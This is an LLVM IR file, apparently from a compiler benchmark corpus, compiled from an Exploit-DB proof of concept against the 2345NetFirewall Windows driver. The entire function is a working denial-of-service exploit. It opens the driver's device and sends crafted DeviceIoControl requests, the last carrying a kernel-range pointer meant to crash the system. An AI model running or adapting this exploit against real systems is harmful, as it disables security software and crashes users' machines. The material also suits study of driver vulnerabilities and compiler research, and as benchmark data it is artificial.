; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows_x86/dos/extr_44600.c_poc_2345NetFirewall.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows_x86/dos/extr_44600.c_poc_2345NetFirewall.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_6__ = type { i32, i32, i32, i32*, i32, i32, i32, i8* }

@.str = private unnamed_addr constant [20 x i8] c"\\\\.\\2345NetFirewall\00", align 1
@GENERIC_READ = common dso_local global i32 0, align 4
@GENERIC_WRITE = common dso_local global i32 0, align 4
@FILE_SHARE_READ = common dso_local global i32 0, align 4
@FILE_SHARE_WRITE = common dso_local global i32 0, align 4
@OPEN_EXISTING = common dso_local global i32 0, align 4
@FILE_ATTRIBUTE_NORMAL = common dso_local global i32 0, align 4
@INVALID_HANDLE_VALUE = common dso_local global i64 0, align 8
@.str.1 = private unnamed_addr constant [27 x i8] c"[-] Open device error: %d\0A\00", align 1
@.str.2 = private unnamed_addr constant [34 x i8] c"[-] DeviceIoControl %x error: %d\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @poc_2345NetFirewall() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i64, align 8
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca %struct.TYPE_6__, align 8
  %6 = alloca %struct.TYPE_6__, align 8
  %7 = alloca %struct.TYPE_6__, align 8
  %8 = load i32, i32* @GENERIC_READ, align 4
  %9 = load i32, i32* @GENERIC_WRITE, align 4
  %10 = or i32 %8, %9
  %11 = load i32, i32* @FILE_SHARE_READ, align 4
  %12 = load i32, i32* @FILE_SHARE_WRITE, align 4
  %13 = or i32 %11, %12
  %14 = load i32, i32* @OPEN_EXISTING, align 4
  %15 = load i32, i32* @FILE_ATTRIBUTE_NORMAL, align 4
  %16 = call i64 @CreateFileA(i8* getelementptr inbounds ([20 x i8], [20 x i8]* @.str, i64 0, i64 0), i32 %10, i32 %13, i32* null, i32 %14, i32 %15, i32* null)
  store i64 %16, i64* %2, align 8
  %17 = load i64, i64* %2, align 8
  %18 = load i64, i64* @INVALID_HANDLE_VALUE, align 8
  %19 = icmp eq i64 %17, %18
  br i1 %19, label %20, label %23

20:                                               ; preds = %0
  %21 = call i32 (...) @GetLastError()
  %22 = call i32 (i8*, i32, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.1, i64 0, i64 0), i32 %21)
  store i32 1, i32* %1, align 4
  br label %67

23:                                               ; preds = %0
  store i32 0, i32* %3, align 4
  store i32 2237080, i32* %4, align 4
  %24 = bitcast %struct.TYPE_6__* %5 to i8*
  call void @llvm.memset.p0i8.i64(i8* align 8 %24, i8 0, i64 48, i1 false)
  %25 = call i8* (...) @GetCurrentProcessId()
  %26 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %5, i32 0, i32 7
  store i8* %25, i8** %26, align 8
  %27 = load i64, i64* %2, align 8
  %28 = load i32, i32* %4, align 4
  %29 = call i32 @DeviceIoControl(i64 %27, i32 %28, %struct.TYPE_6__* %5, i32 48, %struct.TYPE_6__* %5, i32 48, i32* %3, i32* null)
  %30 = icmp ne i32 %29, 0
  br i1 %30, label %35, label %31

31:                                               ; preds = %23
  %32 = load i32, i32* %4, align 4
  %33 = call i32 (...) @GetLastError()
  %34 = call i32 (i8*, i32, ...) @printf(i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str.2, i64 0, i64 0), i32 %32, i32 %33)
  br label %35

35:                                               ; preds = %31, %23
  store i32 2237092, i32* %4, align 4
  %36 = bitcast %struct.TYPE_6__* %6 to i8*
  call void @llvm.memset.p0i8.i64(i8* align 8 %36, i8 0, i64 48, i1 false)
  %37 = call i8* (...) @GetCurrentProcessId()
  %38 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %6, i32 0, i32 7
  store i8* %37, i8** %38, align 8
  %39 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %6, i32 0, i32 0
  store i32 1, i32* %39, align 8
  %40 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %5, i32 0, i32 6
  %41 = load i32, i32* %40, align 8
  %42 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %6, i32 0, i32 5
  %43 = load i32, i32* %42, align 4
  %44 = call i32 @calc_seed(i32 %41, i32 %43)
  %45 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %6, i32 0, i32 1
  store i32 26, i32* %45, align 4
  %46 = load i64, i64* %2, align 8
  %47 = load i32, i32* %4, align 4
  %48 = call i32 @DeviceIoControl(i64 %46, i32 %47, %struct.TYPE_6__* %6, i32 48, %struct.TYPE_6__* %6, i32 48, i32* %3, i32* null)
  %49 = icmp ne i32 %48, 0
  br i1 %49, label %54, label %50

50:                                               ; preds = %35
  %51 = load i32, i32* %4, align 4
  %52 = call i32 (...) @GetLastError()
  %53 = call i32 (i8*, i32, ...) @printf(i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str.2, i64 0, i64 0), i32 %51, i32 %52)
  br label %54

54:                                               ; preds = %50, %35
  store i32 2236480, i32* %4, align 4
  %55 = bitcast %struct.TYPE_6__* %7 to i8*
  call void @llvm.memset.p0i8.i64(i8* align 8 %55, i8 0, i64 48, i1 false)
  %56 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %7, i32 0, i32 2
  store i32 1, i32* %56, align 8
  %57 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %7, i32 0, i32 3
  store i32* inttoptr (i64 2147483648 to i32*), i32** %57, align 8
  %58 = load i64, i64* %2, align 8
  %59 = load i32, i32* %4, align 4
  %60 = call i32 @DeviceIoControl(i64 %58, i32 %59, %struct.TYPE_6__* %7, i32 48, %struct.TYPE_6__* %7, i32 48, i32* %3, i32* null)
  %61 = icmp ne i32 %60, 0
  br i1 %61, label %66, label %62

62:                                               ; preds = %54
  %63 = load i32, i32* %4, align 4
  %64 = call i32 (...) @GetLastError()
  %65 = call i32 (i8*, i32, ...) @printf(i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str.2, i64 0, i64 0), i32 %63, i32 %64)
  br label %66

66:                                               ; preds = %62, %54
  store i32 0, i32* %1, align 4
  br label %67

67:                                               ; preds = %66, %20
  %68 = load i32, i32* %1, align 4
  ret i32 %68
}

declare dso_local i64 @CreateFileA(i8*, i32, i32, i32*, i32, i32, i32*) #1

declare dso_local i32 @printf(i8*, i32, ...) #1

declare dso_local i32 @GetLastError(...) #1

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memset.p0i8.i64(i8* nocapture writeonly, i8, i64, i1 immarg) #2

declare dso_local i8* @GetCurrentProcessId(...) #1

declare dso_local i32 @DeviceIoControl(i64, i32, %struct.TYPE_6__*, i32, %struct.TYPE_6__*, i32, i32*, i32*) #1

declare dso_local i32 @calc_seed(i32, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
